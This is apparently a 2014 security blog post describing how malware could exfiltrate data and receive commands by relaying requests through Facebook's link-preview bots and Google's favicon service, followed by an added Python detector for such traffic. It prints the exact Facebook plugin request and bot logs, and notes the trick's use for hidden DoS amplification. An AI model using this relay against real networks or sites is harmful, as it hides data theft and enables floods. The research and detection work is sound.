APT: bot exfiltration

In the world of advanced persistent threats (APTs), the techniques used by malware artifacts to communicate with and exfiltrate information to their C2s (Command & Control) play an important role. There are as many techniques as there are protocols and services, limited only by the attacker’s imagination. Just a few small examples of “tricks” for disguising illegitimate traffic as apparently normal information are:

  • HTTP requests to apparently legitimate pages, which have been compromised to host C2 code.
  • Abuse of the DNS protocol to exfiltrate data and communicate with the attackers.
  • Abuse of Google Calendar.

The above list could be almost as long as the number of present and past APT campaigns. In this post I’d like to offer a new form of exfiltration in which the infected equipment and the C2 never exchange information directly. Instead, they do so through a legion of bots operated by the great giants of the Internet: Google, Facebook or Twitter, among others.

What are these bots for, and what is their function? Facebook, for example, has a series of agents that generate a preview of the content behind a link whenever a comment is posted on the social network. This lets the linked web content be presented to the user in a more pleasant way. So, when Facebook receives the link, it “orders” its bots to visit the URL and extract information from the associated website.

The reader will have realized that, by controlling the URL we want the bots to connect to, we have a way to send information to a domain owned by the attacker, relaying the request through Facebook. This gives us the first “infected equipment” -> “C2” communication channel. The request will go unnoticed by the victim’s security analysts, since what they actually see are requests made to the social network.

The first obstacle to executing the redirection came from the need to have a valid Facebook account and be authenticated in order to post. Searching a bit further through their documentation, I found I could post without being authenticated. The magic was in the “Developers” section. Here is the GET request that lets you direct Facebook’s bots as you please to visit whatever you send them.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMAIN TO VISIT
&locale=en_US
&numposts=2
&sdk=joey
&width=500

The quick-witted will have already realized that this can be used not only to exfiltrate information but also, for example, to conduct hidden DoS attacks or inflate visitor counts. As an example, here is my Apache log after telling Facebook to visit my website.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794 "http://miserver.no-ip.org/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

The truth is you get good amplification: a single request to Facebook generated 43 GETs from 10 different bots against the target website. But I’m changing the subject; back to the APTs.

Now that we can exfiltrate, we need a way to send control commands to the infected equipment inside the victim organization. For this part we’ll turn to the Google bots for help. These too can be steered so that they not only visit what we want but also carry our orders back to the infected equipment.

Usually, when a C2 wants to execute a command on the victim, the exchange does not go in the C2 -> “infected equipment” direction but the opposite way, since it is the malware on the infected host that initiates the communication.

Well, Google has a URL which, given a domain, returns that domain’s favicon, and this is perfect for relaying the orders to be executed on the infected equipment.

http://www.google.com/s2/favicons?domain=DOMAIN-TO-VISIT

Once the request is made, the following requests from the bot appear in the C2 log:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

In this favicon we could, using steganographic techniques for example, embed the control information sent to the infected equipment. We have thus set up bi-directional communication with the C2 without any direct channel between the infected equipment and the command and control server, perfect for going unnoticed.
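Turning the post around to the defender’s side, here is an added example (not part of the original post) in Python: it scans outbound proxy log lines for the two fetch-proxy endpoints discussed above (the Facebook comments plugin and Google’s favicon service), pulls out the third-party domain each request asks the platform’s bots to visit, and reports which internal clients pointed them at domains outside an allowlist. The log format, the allowlist and the sample lines are constructed assumptions, not real data.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-log sample (assumed format: "client_ip method url" per line).
SAMPLE_PROXY_LOG = """\
10.0.0.5 GET https://www.facebook.com/plugins/comments.php?href=http://intranet.example.local/news&numposts=2
10.0.0.5 GET https://www.facebook.com/plugins/comments.php?href=http://miserver.no-ip.org/kaka333333339&numposts=2
10.0.0.5 GET http://www.google.com/s2/favicons?domain=miserver.no-ip.org
10.0.0.7 GET https://www.facebook.com/plugins/comments.php?href=http://www.example.com/blog&numposts=2
10.0.0.9 GET https://www.facebook.com/plugins/comments.php?href=http://miserver.no-ip.org/data-1&numposts=2
"""

# Endpoints whose query parameter names a third-party resource the platform's bots will fetch.
FETCH_PROXIES = {
    ("www.facebook.com", "/plugins/comments.php"): "href",   # href= carries a full URL
    ("www.google.com", "/s2/favicons"): "domain",            # domain= carries a bare host
}

# Assumed allowlist: domains the organisation expects its users to have previewed.
KNOWN_GOOD = {"www.example.com", "intranet.example.local"}


def extract_fetch_target(url):
    """Return the host the platform bot would be told to visit, or None if url is not a fetch-proxy endpoint."""
    parts = urlsplit(url)
    param = FETCH_PROXIES.get((parts.hostname, parts.path))
    if param is None:
        return None
    values = parse_qs(parts.query).get(param)   # parse_qs also percent-decodes the value
    if not values:
        return None
    target = values[0]
    host = urlsplit(target).hostname if "://" in target else target
    return host.lower() if host else None


def find_bot_relay_usage(log_text, known_good=KNOWN_GOOD):
    """Map client IP -> sorted (service host, relayed target) pairs whose target is not allowlisted."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        try:
            client, _method, url = line.split(None, 2)
        except ValueError:
            continue  # skip malformed lines rather than abort the scan
        target = extract_fetch_target(url)
        if target and target not in known_good:
            findings[client].add((urlsplit(url).hostname, target))
    return {client: sorted(pairs) for client, pairs in findings.items()}
```

A client that repeatedly relays requests to the same unknown domain through both services, as 10.0.0.5 does here, is the pattern worth escalating; a dynamic-DNS hostname in that position raises the priority further.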